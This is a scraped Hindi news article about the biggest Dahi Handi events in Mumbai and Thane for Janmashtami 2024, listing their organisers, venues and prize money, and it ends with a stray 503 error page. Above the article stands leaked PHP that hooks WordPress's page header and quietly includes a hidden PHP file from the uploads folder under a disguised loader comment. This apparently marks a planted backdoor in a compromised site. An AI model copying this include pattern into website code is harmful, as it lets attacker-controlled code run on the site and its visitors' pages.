add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Dahi Handi : मुंबई-ठाणे में इन जगहों पर लगेगी सबसे ऊंची दही हांडी, यहां 50 लाख का इनाम, मालामाल होंगे गोविंदा! – SOCH INDIA
Menu

देश
Dahi Handi : मुंबई-ठाणे में इन जगहों पर लगेगी सबसे ऊंची दही हांडी, यहां 50 लाख का इनाम, मालामाल होंगे गोविंदा!

nobanner

कृष्ण जन्माष्टमी 2024 (Krishna Janmashtami 2024) के मौके पर मुंबई और ठाणे में दही हांडी उत्सव बड़े ही हर्षोल्लास के साथ मनाया जा रहा है। इस साल 27 अगस्त को दही हांडी उत्सव है। जिसके लिए गोविंदाओं की टोलियां और आयोजक कई दिनों से तैयारियां कर रहे हैं। मुंबई और ठाणे की सड़कों पर मंगलवार सुबह से ही कृष्ण जन्माष्टमी की धूम होगी। सूरज चढ़ने के साथ ही गली मोहल्लों में ‘गोविंदा आला रे आला’ की गूंज सुनाई देगी। शहर के विभिन्न हिस्सों से युवाओं की टोली दही हांडी फोड़ने के लिए रवाना होगी।

दही हांडी उत्सव में हर साल की तरह इस बार भी राजनीतिक दल बढ़ चढ़कर हिस्सा ले रहे हैं। मुख्यमंत्री एकनाथ शिंदे और अन्य दिग्गज नेता कई कार्यक्रमों में शामिल होंगे। जन्माष्टमी के मौके पर मुंबई, ठाणे में दशकों से मनाये जाने वाले इस लोकप्रिय उत्सव के लिए लाखों के इनाम रखे गए है। यह इनाम मानव पिरामिड (थर) की उंचाई के आधार पर तय किये गए है।
बता दें कि दही हांडी उत्सव में दही से भरी मटकी हवा में लटक रही होती है और गोविंदाओं की टोली मानव पिरामिड बनाकर उसे तोड़ते है।
मुंबई और ठाणे में यहां लगेगी सबसे उंची दही-हांडी:
1) ठाणे – संस्कृति प्रतिष्ठान
आयोजक- विधायक प्रताप सरनाईक
स्थान – ठाणे महानगर पालिका स्कूल ग्राउंड, वर्तक नगर, ठाणे
इस साल पहले नौ थर लगाने वाली गोविंदा टोली को 11 लाख का पुरस्कार दिया जाएगा।
2) ठाणे- मनसे दही हांडी उत्सव
आयोजक – MNS नेता अविनाश जाधव
स्थान – भगवती मैदान, विष्णु नगर, नौपाडा, ठाणे
3) ठाणे – दिघे साहेबांची हंडी (शिवसेना) मानाची हांडी
मार्गदर्शक – मुख्यमंत्री एकनाथ शिंदे
स्थान- टेंभी नाका, ठाणे
4) राम कदम दही हांडी
मुंबई के घाटकोपर में बीजेपी विधायक राम कदम (Ram Kadam) ने एक बार फिर भारत की सबसे बड़ी दही हांडी लगाने का दावा किया है। हालांकि इसके इनाम की राशि का खुलासा नहीं हुआ है।
स्थान- घाटकोपर श्रेयस सिग्नल
5) मुंबई के वर्ली में जांबोरी मैदान में बीजेपी की परिवर्तन दही हांडी उत्सव में कुल 50 लाख से ज्यादा का इनाम रखा गया हैं। इसमें कई बड़े नेता और अभिनेता शिरकत करने वाले है। वर्ली में हनुमान मैदान, वीर जिजामातानगर में शिवसेना उद्धव गुट की दही हांडी उत्सव आयोजित होगी।

6) साई जलाराम प्रतिष्ठान की दही हांडी
ठाणे नगर निगम के पूर्व विपक्षी नेता देवराम भोईर के मार्गदर्शन में बालकूम जकात नाका स्थित साईं जलाराम प्रतिष्ठान द्वारा आयोजित दही हांडी उत्सव में लाखों के पुरस्कार दिए जाएंगे।
7) धारावी में 11 लाख 111 रुपये की दहीहांडी का आयोजन किया गया है।
8) विक्रोली मनसे और शिवसेना भी लाखों रुपये के इनाम वाली दही हांडी का आयोजन करेगी।
9) बोरीवली में माघाटणे प्रकाश सुर्वे की दही हांडी में लाखों रुपये का इनाम दिया जाएगा, इसमें कई मशहूर हस्तियों की एंट्री देखने को मिलेगी।
10) ठाणे में सरनाईक की तरह ही मनसे के नेता अविनाश जाधव और शिवसेना नेता नरेश मस्के भी बड़ी दही हांडी कार्यक्रम का आयोजन कर रहे है।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.